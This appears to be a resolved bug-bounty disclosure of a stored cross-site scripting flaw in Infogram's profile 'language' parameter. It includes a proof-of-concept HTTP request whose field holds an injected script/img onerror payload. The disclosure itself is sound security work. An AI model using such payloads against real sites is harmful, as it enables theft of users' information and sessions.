Stored XSS in via language
Discovered by theappsec on Infogram

This issue took 0 Days and 12 hours to triage and 0 Days and 3 hours to resolve once triaged.

The stored XSS was found in the language profile parameter.

POC: Change profile settings with following request:

PUT /api/users/me HTTP/1.1
csrf-token: **your token**
Cookie: **your cookies**

first_name=name&last_name=name&username=&confirm_password=password&language=></script><img src=x onerror=alert(document.domain)>;//

Go to your public profile link.



This allows an attacker to inject custom Javascript codes that can be used to steal information from infogram's users.